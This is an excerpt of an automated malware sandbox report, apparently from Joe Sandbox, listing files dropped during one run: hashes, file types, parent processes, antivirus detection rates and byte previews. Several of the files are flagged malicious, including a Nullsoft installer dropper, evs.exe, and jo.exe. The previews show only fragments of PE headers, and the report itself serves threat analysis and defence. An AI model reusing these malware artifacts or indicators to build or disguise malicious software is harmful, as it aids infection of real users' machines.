                                                                                                                                                                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\nulhfhsi.exe.log
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\nulhfhsi.exe
                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2599
                                                                                                                                                                                            Entropy (8bit):5.332456341785073
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:MxHKXwYHKhQnogLHqHDfHK7HKdHKBSTHaAHKzvRtHoxHImHKhBHKoHaHZHG1qHjY:iqXwYqhQnogLKTq7qdqslqzJtIxHbqLd
                                                                                                                                                                                            MD5:B5A02A14896503A67135C039AD71B3A1
                                                                                                                                                                                            SHA1:B7D7128A26413AB610E4043927F1F8A3FC464350
                                                                                                                                                                                            SHA-256:E003A2AF68E8FFA0A60BC477B36B3C32DBC483B42D767B96FFF9F7FDEF84AF35
                                                                                                                                                                                            SHA-512:0AF38B06DA9A880F5B3E4C1254D094388BD6608A94809AC80E9F14FE0557A695DE03F0187EB5B43861D79E176406A0E1948FE611332D8DBD56043F508BCF36AE
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\34957343ad5d84daee97a1affda91665\System.Runt
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{604B4475-75FA-11EB-90E5-ECF4BB570DC9}.dat
                                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                            File Type:Microsoft Word Document
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):21592
                                                                                                                                                                                            Entropy (8bit):1.7555123810813766
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:IwsGcprZGwpLVQG/ap8VEbGIpcVESlGvnZpvVES7d1GoR7/Cqp9VES7Vd8Go497l:rwZTZs2YWCtJrbfXnRyKMyak
                                                                                                                                                                                            MD5:3C05E7ECE8F462293D93F71B6CD44B64
                                                                                                                                                                                            SHA1:95BEE310F27B4E47DE974BC199418904150A0EAC
                                                                                                                                                                                            SHA-256:C439D2C13E7014A50DA8980E877C52452A183BBEC70726E3F5142528F53ED60E
                                                                                                                                                                                            SHA-512:7AC1E17EED320A36AD078BF25C038507E5D44708FE5AF42DA3CD7BB278AE2C191F9F59331C6FAB19502A9834574CF4C651BD15998AD7091CD3956213E530ADC5
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{604B4477-75FA-11EB-90E5-ECF4BB570DC9}.dat
                                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                            File Type:Microsoft Word Document
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):24636
                                                                                                                                                                                            Entropy (8bit):1.725989812102086
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:rcZfbQka6i2BS9jx2VfWVBMVJO72++TyL2zg:rcZDQL6Nk9jx2VfWVBMVJO72Hg
                                                                                                                                                                                            MD5:9FEE21A257E930FB6B2A4D62E09672FE
                                                                                                                                                                                            SHA1:108B5D149C569034C397F1B349230B0623A6D608
                                                                                                                                                                                            SHA-256:A8C9BD58A4728812F73BF4CAAB19593BD98B43F7F25EC33FDBD042668230AEF1
                                                                                                                                                                                            SHA-512:970B5FF6BCF40E240BB4C3E2522989BB571933F90910CF6849FBA5FC1DF6FC5319FD0CE507329BE4FA7A773AD9440F2D9D3D3C8C20DB3F7FECCAD950BE2BCB16
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\errorPageStrings[1]
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):4720
                                                                                                                                                                                            Entropy (8bit):5.164796203267696
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                                                                                                                                                                            MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                                                                                                                                                                            SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                                                                                                                                                                            SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                                                                                                                                                                            SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            IE Cache URL:res://ieframe.dll/errorPageStrings.js
                                                                                                                                                                                            Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\dnserror[1]
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):2997
                                                                                                                                                                                            Entropy (8bit):4.4885437940628465
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                                                                                                                                                                                            MD5:2DC61EB461DA1436F5D22BCE51425660
                                                                                                                                                                                            SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                                                                                                                                                                                            SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                                                                                                                                                                                            SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            IE Cache URL:res://ieframe.dll/dnserror.htm?ErrorStatus=0x800C0005&DNSError=9002
                                                                                                                                                                                            Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\down[1]
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):748
                                                                                                                                                                                            Entropy (8bit):7.249606135668305
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                                                                                                                                                                            MD5:C4F558C4C8B56858F15C09037CD6625A
                                                                                                                                                                                            SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                                                                                                                                                            SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                                                                                                                                                            SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            IE Cache URL:res://ieframe.dll/down.png
                                                                                                                                                                                            Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\httpErrorPagesScripts[1]
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):12105
                                                                                                                                                                                            Entropy (8bit):5.451485481468043
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                                                                                                                                                            MD5:9234071287E637F85D721463C488704C
                                                                                                                                                                                            SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                                                                                                                                                            SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                                                                                                                                                            SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            IE Cache URL:res://ieframe.dll/httpErrorPagesScripts.js
                                                                                                                                                                                            Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\NewErrorPageTemplate[1]
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):1612
                                                                                                                                                                                            Entropy (8bit):4.869554560514657
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                                                                                                                                                                                            MD5:DFEABDE84792228093A5A270352395B6
                                                                                                                                                                                            SHA1:E41258C9576721025926326F76063C2305586F76
                                                                                                                                                                                            SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                                                                                                                                                                                            SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            IE Cache URL:res://ieframe.dll/NewErrorPageTemplate.css
                                                                                                                                                                                            Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ddjaedok.t1x.ps1
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: 1
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_het1b5au.ft2.psm1
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                            Category:modified
                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: 1
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\evs.exe
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\nulhfhsi.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):309398
                                                                                                                                                                                            Entropy (8bit):6.8622477052521065
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:wY8ikhaPatWRhVd2ta4fAyQ8BHPg/bbe6:6IzRha0wlPsb5
                                                                                                                                                                                            MD5:8C373745D8604DA05314DE16F0BF7CED
                                                                                                                                                                                            SHA1:14C4FF5FAED482F598A2D209D1288B72CEB633CF
                                                                                                                                                                                            SHA-256:13CB3BE20C296E15AD249F67E7D791DF34C7D7EBA819D08845BD244738A9F24E
                                                                                                                                                                                            SHA-512:EF58CE10E582AD80B4C1313E43EDDD5B13B856FAAAFBD9A10EE58A294006981E8F9D87BE75F98D085307F7A9F64B19B9E42736FF46CF76E1A9F1155C49C60493
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 82%
                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@........./.........r.../..............+......Rich...........PE..L......].................b....9.....H2............@..........................p<...........@.................................0.........:..............................................................................................................text....`.......b.................. ..`.rdata..>............f..............@..@.data...X.9..........z..............@....ndata.......@:..........................rsrc.........:......~..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\hello_C# (2).exe
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\evs.exe
                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):3584
                                                                                                                                                                                            Entropy (8bit):3.413295575615442
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:etGSATEYkF7qIjlVxI+ndtkZfxPclljKINPcAzxrsuZhNrfTqPNnqpdt4+lEbNFf:6XYbsfx5YJ1cll5OulbTGqXSfbNtm
                                                                                                                                                                                            MD5:D6B9F530E7E8DDEBEA8069A0D94AD38E
                                                                                                                                                                                            SHA1:28B7ADA0D7CBFACCC5CF66D2D22E08E9132B3C67
                                                                                                                                                                                            SHA-256:3E788314AC14E4F4040460E5140DAB61E2CF8968CF36E458EE875EC382787904
                                                                                                                                                                                            SHA-512:2F80E079AEAEC7ED92C0BF8216CE0C362BC63F104090185EBDD140C13B5D97FD57C84C3CE71700B18CA651C0C075A5567F84847A1389FBC32A199EB050468815
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Trojan.DownLoader36.34557.26355.exe, Detection: malicious, Browse
                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...7%.^.............................#... ...@....@.. ....................................@.................................p#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......| ...............................................................0...........r...p.r%..p...(....&*..(....*..BSJB............v4.0.30319......l.......#~..x.......#Strings....`...4...#US.........#GUID.......P...#Blob...........G.........%3........................................................8.1...o.O.....O.........................................P ......?.....r ......D.........J...D.....D...!.......D.......%....... .....................................(...............
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\hello_C#.exe
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\evs.exe
                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):3584
                                                                                                                                                                                            Entropy (8bit):3.413295575615442
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:etGSATEYkF7qIjlVxI+ndtkZfxPclljKINPcAzxrsuZhNrfTqPNnqpdt4+lEbNFf:6XYbsfx5YJ1cll5OulbTGqXSfbNtm
                                                                                                                                                                                            MD5:D6B9F530E7E8DDEBEA8069A0D94AD38E
                                                                                                                                                                                            SHA1:28B7ADA0D7CBFACCC5CF66D2D22E08E9132B3C67
                                                                                                                                                                                            SHA-256:3E788314AC14E4F4040460E5140DAB61E2CF8968CF36E458EE875EC382787904
                                                                                                                                                                                            SHA-512:2F80E079AEAEC7ED92C0BF8216CE0C362BC63F104090185EBDD140C13B5D97FD57C84C3CE71700B18CA651C0C075A5567F84847A1389FBC32A199EB050468815
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Trojan.DownLoader36.34557.26355.exe, Detection: malicious, Browse
                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...7%.^.............................#... ...@....@.. ....................................@.................................p#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......| ...............................................................0...........r...p.r%..p...(....&*..(....*..BSJB............v4.0.30319......l.......#~..x.......#Strings....`...4...#US.........#GUID.......P...#Blob...........G.........%3........................................................8.1...o.O.....O.........................................P ......?.....r ......D.........J...D.....D...!.......D.......%....... .....................................(...............
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\jo.exe
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\evs.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):309248
                                                                                                                                                                                            Entropy (8bit):6.586028218669115
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:u5IoCrSgLNdwesRGs1L3LNPeXSsJezvKc02k6XEhqLvpGTvz:uYSk7dsRGs1H9eXSsJexQvGv8T
                                                                                                                                                                                            MD5:28E49F705BFD5A6785391BAC1C0E3359
                                                                                                                                                                                            SHA1:DF9EEBA64C82500D7C048E1C4ADDF02D3228C100
                                                                                                                                                                                            SHA-256:1751A250EEFE8A940227887D05FC0547C7959F76418BC56689044564D2491116
                                                                                                                                                                                            SHA-512:E660EE72E57A3E796EDE9EC04EA3985C552E3F88DC616AB1BD7CA9E8F8CC05FC4F72D1AB4C141764EB6A63EFAB9A336DE5A35E595971768504AC6D323411F186
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........q...........................?....d.............................Rich............................PE..L......].................d....A.....0O............@..........................@D..............................................!..(.....C..s...........................................................................................................text....c.......d.................. ..`.rdata..F............h..............@..@.data....t?..0......................@....tls..........C......B..............@....rsrc....s....C..t...D..............@..@........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsx24D0.tmp\KSRDY0PL.dll
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\evs.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):6656
                                                                                                                                                                                            Entropy (8bit):5.150852446596736
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:4BNbUVOFvfcxEAxxxJzxLp+eELeoMEskzYzeHd0+uoyVeNSsX4:EUVOFvf9ABJFHE+FkEad0PLVeN
                                                                                                                                                                                            MD5:293165DB1E46070410B4209519E67494
                                                                                                                                                                                            SHA1:777B96A4F74B6C34D43A4E7C7E656757D1C97F01
                                                                                                                                                                                            SHA-256:49B7477DB8DD22F8CF2D41EE2D79CE57797F02E8C7B9E799951A6C710384349A
                                                                                                                                                                                            SHA-512:97012139F2DA5868FE8731C0B0BCB3CFDA29ED10C2E6E2336B504480C9CD9FB8F4728CCA23F1E0BD577D75DAA542E59F94D1D341F4E8AAEEBC7134BF61288C19
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                            • Filename: FG1eBAAwpR.exe, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: 8XioA9UTsz.exe, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: 8XioA9UTsz.exe, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SecuriteInfo.com.Trojan.DownLoader36.34557.26355.exe, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: Build1.exe, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: Build.exe, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: s3X615I7Qn.exe, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: DIGFK6SFVU.exe, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: Cess5ioLRO.rtf, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: svchost.exe, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: svchost.exe, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: ServHelp.msi, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: ServHelp.msi, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: FILE-71421.exe, Detection: malicious, Browse
                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........PE..L......]...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\revs.exe
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\nulhfhsi.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4602592
